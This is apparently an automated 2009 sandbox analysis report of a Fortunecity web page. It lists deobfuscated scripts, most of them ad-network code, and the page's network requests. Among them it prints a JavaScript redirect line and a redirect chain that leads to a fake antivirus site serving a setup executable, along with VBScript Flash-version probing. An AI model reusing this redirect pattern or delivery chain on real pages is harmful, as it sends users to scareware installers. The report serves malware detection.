Analysis report for http://cropperddi.fortunecity.com/6766.html
Sample Overview
| URL | http://cropperddi.fortunecity.com/6766.html |
|---|---|
| MD5 | fa5c5fea775ed795a7f6bdd131ec5c86 |
| Analysis Started | 2009-04-24 09:06:43 |
| Report Generated | 2009-04-24 09:07:11 |
| Jsand version | 1.03.02 |
Detection results
| Detector | Result |
|---|---|
| Jsand 1.03.02 | suspicious |
Warning:
- The analyzed resource uses an unknown script language (unspecified/VBScript)
- The analyzed resource uses too much memory.
- The analyzed resource contains one or more syntax errors.
This may affect the detection of malicious code.
Exploits
No exploits were identified.
Deobfuscation results
Evals
- (repeated 1 time)
g = "http://redirxl.com/filt/in.cgi?5&group=5q"; window.location = g;
- (repeated 1 time)
w.resizeTo(x * 10, x * 11 - 7)
- (repeated 1 time)
window.attachEvent('onunload', ext);
- (repeated 1 time)
window.showModalDialog(popURL, '', popDialogOptions)
Writes
- (repeated 1 time)
<script language="JavaScript">var zflag_nid = "895"; var zflag_cid = "23/22"; var zflag_sid = "1"; var zflag_width = "728"; var zflag_height = "90"; var zflag_sz = "14"; </script><script language="JavaScript" src= "http://d3.zedo.com/jsc/d3/fo.js"></script>
- (repeated 3 times)
<script language=VBScript>
- (repeated 3 times)
onerrorresumenext
- (repeated 3 times)
a0 = IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.5"))
- (repeated 3 times)
if (a0 <= 0)thena0 = IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.4"))
- (repeated 3 times)
</script>
- (repeated 1 time)
<script language="JavaScript" src= "http://d7.zedo.com/bar/v15-101/d3/jsc/fm.js?c=23/22&f=&n=895&r=1&d=14&q=&s=1&z=0.9510209056020588"> </script>
- (repeated 2 times)
<script type="text/javascript">
- (repeated 2 times)
google_ad_client = "pub-1479578193153787";
- (repeated 1 time)
google_ad_slot = "8280529791";
- (repeated 2 times)
google_ad_width = 728;
- (repeated 1 time)
google_ad_height = 90;
- (repeated 2 times)
</script>
- (repeated 2 times)
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
- (repeated 1 time)
<iframe SRC="http://d13.zedo.com/jsc//zpu.html?f=;z=2-103" width=0 height=0 frameborder=0 style= "position:absolute;border:0px;"></iframe>
- (repeated 1 time)
<script language="JavaScript">var zflag_nid = "895"; var zflag_cid = "23/22"; var zflag_sid = "1"; var zflag_width = "728"; var zflag_height = "15"; var zflag_sz = "18"; </script><script language="JavaScript" src= "http://d3.zedo.com/jsc/d3/fo.js"></script>
- (repeated 1 time)
<script language="JavaScript" src= "http://d7.zedo.com/bar/v15-101/d3/jsc/fm.js?c=23/22&f=&n=895&r=1&d=18&q=&s=1&z=0.9463957649755115"> </script>
- (repeated 1 time)
google_ad_slot = "7230665922";
- (repeated 1 time)
google_ad_height = 15;
Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://cropperddi.fortunecity.com/6766.html | 200 | text/html |
| http://www.fortunecity.com/js/adscript.global.js | 200 | text/javascript |
| http://d3.zedo.com/jsc/d3/fo.js | 200 | text/javascript |
| http://d7.zedo.com/bar/v15-101/d3/jsc/fm.js?c=23/22&f=&n=895&r=1&d=14&q=&s=1&z=0.9510209056020588 | 200 | text/javascript |
| http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 | text/javascript |
| about:blank | 200 | text/html |
| http://d7.zedo.com/bar/v15-101/d3/jsc/fm.js?c=23/22&f=&n=895&r=1&d=18&q=&s=1&z=0.9463957649755115 | 200 | text/javascript |
| http://cropperddi.fortunecity.com/menu.js | 200 | text/javascript |
| http://redirxl.com/filt/in.cgi?5&group=5q | 302 | text/html |
| http://antivir-scan-pro-best.com/11038/3/ | 200 | text/html |
| http://antivir-scan-pro-best.com/landing/sp/3/images/jquery00.js | 200 | text/javascript |
| http://antivir-scan-pro-best.com/landing/sp/3/images/jquery-i.js | 200 | text/javascript |
| http://antivir-scan-pro-best.com/landing/sp/3/images/flist000.js | 200 | text/javascript |
| http://files.load-archive-av-pro.com/normal/setup_11038_3_1.exe | 200 | application/x-msdos-program |
Redirects
| From | To |
|---|---|
| http://redirxl.com/filt/in.cgi?5&group=5q | http://antivir-scan-pro-best.com/11038/3/ |
ActiveX controls
- 6BF52A52-394A-11D3-B153-00C04F79FAA6
Attributes
| Name | Value | Count |
|---|---|---|
| jQuery1240589210527 | 136.0 | 1 |
- ShockwaveFlash.ShockwaveFlash.7
Methods
| Name | Arg0 | Count |
|---|---|---|
| GetVariable | $version | 2 |
Shellcode and Malware
No shellcode was identified.
No additional malware was retrieved.